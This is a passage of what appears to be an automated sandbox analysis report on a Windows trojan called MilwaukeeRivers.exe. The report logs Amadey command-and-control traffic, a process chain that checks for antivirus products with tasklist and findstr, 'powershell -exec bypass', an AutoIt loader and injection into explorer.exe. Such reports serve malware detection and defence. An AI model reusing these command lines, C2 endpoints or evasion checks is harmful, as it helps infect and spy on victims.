          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\215655
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\215655\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49725 -> 172.67.182.119:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.16:49724 -> 172.67.182.119:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.16:49726 -> 172.67.182.119:80
          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.16:49726 -> 172.67.182.119:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.182.119 80
          Connects to a pastebin service (likely for C&C)
          Source: unknownDNS query: name: rentry.co
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 44 39 42 34 36 41 41 31 39 43 44 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 39 43 34 31 32 35 31 37 45 46 45 41 37 35 39 36 36 36 41 35 35 39 32 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665D9B46AA19CDD58C48CF8B295278F7EBCB075A9634F4D9C412517EFEA759666A5592DFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49711 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49720 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49718 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49719 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49721 -> 172.67.75.40:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49722 -> 188.114.97.3:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: tkuIaWVNSUOHYBGsHHYaNMFgSmiW.tkuIaWVNSUOHYBGsHHYaNMFgSmiW
          Source: global trafficDNS traffic detected: DNS query: proggresinvj.cyou
          Source: global trafficDNS traffic detected: DNS query: cdn4.creative-habitat.shop
          Source: global trafficDNS traffic detected: DNS query: rentry.co
          Source: global trafficDNS traffic detected: DNS query: cdn2.creative-habitat.shop
          Source: global trafficDNS traffic detected: DNS query: cdn1.creative-habitat.shop
          Source: global trafficDNS traffic detected: DNS query: gardenhub-fitlife3.com
          Source: global trafficDNS traffic detected: DNS query: gardenhub-fitlife2.com
          Source: global trafficDNS traffic detected: DNS query: gardenhub-fitlife.com
          Source: unknownHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Windows\StormCups
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Windows\AgePlants
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Windows\EarlTowards
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Windows\LakesDies
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Windows\NycOperational
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Windows\MrnaWasher
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Windows\Tasks\MB Led SDK.job
          Source: MilwaukeeRivers.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@114/21@13/31
          Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Cpb_Docker\BIT7040.tmp
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2744:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile created: C:\Users\user\AppData\Local\Temp\nsx71EF.tmp
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: MilwaukeeRivers.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeFile read: C:\Users\user\Desktop\MilwaukeeRivers.exe
          Source: unknownProcess created: C:\Users\user\Desktop\MilwaukeeRivers.exe "C:\Users\user\Desktop\MilwaukeeRivers.exe"
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 215655
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GeologicalAllowStoryVirtually" Commitments
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Comparing.pif g
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 215655
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GeologicalAllowStoryVirtually" Commitments
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Comparing.pif g
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess created: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe "C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe"
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe "C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe" "C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x"
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1"
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe "C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe" "C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x"
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
